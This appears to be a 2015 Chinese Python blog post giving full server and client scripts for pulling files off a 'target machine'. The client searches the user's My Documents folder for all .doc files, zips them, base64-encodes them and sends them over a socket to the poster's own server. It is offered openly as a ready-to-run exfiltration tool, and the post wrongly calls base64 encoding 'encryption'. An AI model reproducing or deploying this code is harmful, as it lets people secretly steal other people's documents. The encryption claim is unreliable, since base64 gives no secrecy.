python实现获取客户机上指定文件并传输到服务器的方法


Posted in Python onMarch 16, 2015

本文实例讲述了python实现获取客户机上指定文件并传输到服务器的方法。分享给大家供大家参考。具体分析如下:

该程序实现了,把目标机器的某个目录(可控)的所有的某种类型文件(可控)全部获取并传到己方的机器上。

1、用了base64的encode(infile,outfile)加密,以及decode(infile,outfile)解密,这是2进制加密解密
2、用zip压缩
3、socket中server.py放到自己这方python server.py,然后client.py放到目标机器,然后python client.py即可
4、本程序设置了获取doc文件,修改extName可以获取其它类型文件

服务器端程序:

# -*- coding: cp936 -*-

import socket

import win32com.client

import os

import zipfile

import codecs

import base64

def main():

    HOST = '127.0.0.1'

    PORT = 2000

    BUF_SIZE = 6553500 #6M

    key = 'ouyang'

    timeout = 5

    dicName = "ouyang\\"

    ss = socket.socket(socket.AF_INET,socket.SOCK_STREAM)

    try:

        ss.bind((HOST,PORT))

        ss.listen(5)

        print "wating for conntecting..."

        while True:

            try:

                cs,addr = ss.accept()

                socket.setdefaulttimeout(timeout)

                cs.send("200 Connected!")

                #获取加密数据

                encode_data = cs.recv(BUF_SIZE)

                #把数据写到out.zip文件

                tmpfile = open('out.tmp','wb')

                try:

                    tmpfile.write(encode_data)

                    tmpfile.close()

                except IOError,e:

                    print 'Strange error creating IOError:%s' % e  

                    tmpfile.close()

                finally:

                    tmpfile.close()

                #base64 decode 2进制 解密 decode(infile,outfile)

                tmpfile = open('out.tmp','rb')

                outfile = open('out.zip','wb')

                base64.decode(tmpfile,outfile)

                tmpfile.close()

                outfile.close()

                #打开zip文件

                zfile = zipfile.ZipFile('out.zip','r')

                #创建一个文件夹来存放获取的zip文件

                if not os.path.exists(dicName):

                    os.mkdir(dicName)

                for f in zfile.namelist():

                    data = zfile.read(f)

                    file = open(dicName+os.path.basename(f),'w+b')

                    file.write(data)

                    file.close()

                print "finished!!!"

                zfile.close()

                #后续处理 删除临时文件

                os.remove('out.tmp')

                cs.close()

            except socket.error, e:  

                print 'Strange error creating socket:%s' % e  

                cs.close()

        ss.close()

    except socket.error, e:

        print 'Strange error creating socket:%s' % e  

        ss.close()

if __name__=='__main__':

    main()

客户端程序:

# -*- coding: cp936 -*-

import socket

import win32com.client

import win32api

import os

import time

import zipfile

import codecs

import base64

def walk_dir(dir,filelist,extName,topdown=True):

    for root, dirs, files in os.walk(dir, topdown):

        for name in files:

            if (os.path.splitext(os.path.join(root,name)))[-1] == extName:

                filelist.append(os.path.join(root,name))      

        for name in dirs:

            if (os.path.splitext(os.path.join(root,name)))[-1] == extName:

                filelist.append(os.path.join(root,name))

def main():       

    HOST = '127.0.0.1'

    PORT = 2000

    BUF_SIZE = 65535

    key = 'ouyang'

    dicName = "C:\Documents and Settings\Administrator\我的文档"

    extName = '.doc'

    #遍历搜索我的文档的doc类型

    try:

        filelist = []

        walk_dir(dicName,filelist,extName)

    except IOError,e:

        print "文件处理错误: " % e

        sys.exit(-1)

    cs = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 

    try:

        cs.connect((HOST,PORT))

        print cs.recv(BUF_SIZE)

        #压缩成zip文件

        zfile = zipfile.ZipFile('in.zip','w',zipfile.ZIP_DEFLATED)

        for f in filelist:

            zfile.write(f)

        zfile.close()

        #base 2进制 加密 encode(infile,outfile)

        infile = open('in.zip','rb')

        tmpfile = open('in.tmp','wb')

        base64.encode(infile,tmpfile)

        infile.close()

        tmpfile.close()

        #send

        tmpfile = open('in.tmp','rb')

        cs.send(tmpfile.read())

        tmpfile.close()

        #后续处理 删除中间文件

        os.remove('in.tmp')

        cs.close()

    except socket.error ,e:

        print 'socket 出错啦:' % e

        cs.close()

if __name__=='__main__':

    main()

希望本文所述对大家的Python程序设计有所帮助。

Python 相关文章推荐
Android 兼容性问题:java.lang.UnsupportedOperationException解决办法
Mar 19 Python
Python系统监控模块psutil功能与经典用法分析
May 24 Python
Django contenttypes 框架详解(小结)
Aug 13 Python
Python实现的对本地host127.0.0.1主机进行扫描端口功能示例
Feb 15 Python
pandas计算最大连续间隔的方法
Jul 04 Python
pandas按行按列遍历Dataframe的几种方式
Oct 23 Python
Pytorch 的损失函数Loss function使用详解
Jan 02 Python
win10系统下python3安装及pip换源和使用教程
Jan 06 Python
python上传时包含boundary时的解决方法
Apr 08 Python
tensorflow使用freeze_graph.py将ckpt转为pb文件的方法
Apr 22 Python
Django 允许局域网中的机器访问你的主机操作
May 13 Python
如何使用Pytorch搭建模型
Oct 26 Python
python提取内容关键词的方法
Mar 16 #Python
python生成随机mac地址的方法
Mar 16 #Python
python通过线程实现定时器timer的方法
Mar 16 #Python
python每隔N秒运行指定函数的方法
Mar 16 #Python
python实现登陆知乎获得个人收藏并保存为word文件
Mar 16 #Python
Python标准库urllib2的一些使用细节总结
Mar 16 #Python
python实现查询苹果手机维修进度
Mar 16 #Python
You might like
PHP实现多服务器session共享之NFS共享的方法
2007/03/16 PHP
数据库中排序的对比及使用条件详解
2012/02/23 PHP
php curl基本操作详解
2013/07/23 PHP
php实现插入排序
2015/03/29 PHP
php微信高级接口群发 多客服
2016/06/23 PHP
yii使用bootstrap分页样式的实例
2017/01/17 PHP
超强多功能php绿色集成环境详解
2017/01/25 PHP
PHP7内核CGI与FastCGI详解
2019/04/14 PHP
鼠标选择动态改变网页背景颜色的JS代码
2013/12/10 Javascript
jQuery中clearQueue()方法用法实例
2014/12/29 Javascript
javascript密码强度校验代码(两种方法)
2015/08/10 Javascript
JavaScript优化专题之Loading and Execution加载和运行
2016/01/20 Javascript
ionic 上拉菜单(ActionSheet)实例代码
2016/06/06 Javascript
Java  Spring 事务回滚详解
2016/10/17 Javascript
解决使用Vue.js显示数据的时,页面闪现原始代码的问题
2018/02/11 Javascript
layui 数据表格 根据值(1=业务,2=机构)显示中文名称示例
2019/10/26 Javascript
Jquery异步上传文件代码实例
2019/11/13 jQuery
vue proxy 的优势与使用场景实现
2020/06/15 Javascript
详解js中的几种常用设计模式
2020/07/16 Javascript
原生JavaScript实现换肤
2021/02/19 Javascript
Python中扩展包的安装方法详解
2017/06/14 Python
python实现时间o(1)的最小栈的实例代码
2018/07/23 Python
详解python使用pip安装第三方库(工具包)速度慢、超时、失败的解决方案
2018/12/02 Python
python 列表推导式使用详解
2019/08/29 Python
Python如何省略括号方法详解
2020/03/21 Python
Rosetta Stone官方网站:语言学习
2019/01/05 全球购物
我们在web应用开发过程中经常遇到输出某种编码的字符,如iso8859-1等,如何输出一个某种编码的字符串?
2014/03/30 面试题
房地产融资计划书
2014/01/10 职场文书
中层干部竞争上岗演讲稿
2014/01/13 职场文书
小区物业门卫岗位职责
2014/04/10 职场文书
《二泉映月》教学反思
2014/04/15 职场文书
科技节口号
2014/06/19 职场文书
医院领导班子四风问题对照检查材料
2014/10/26 职场文书
士兵突击观后感
2015/06/16 职场文书
详解CSS伪元素的妙用单标签之美
2021/05/25 HTML / CSS
如何打开Win11系统注册表编辑器?Win11注册表编辑器打开修复方法
2022/04/05 数码科技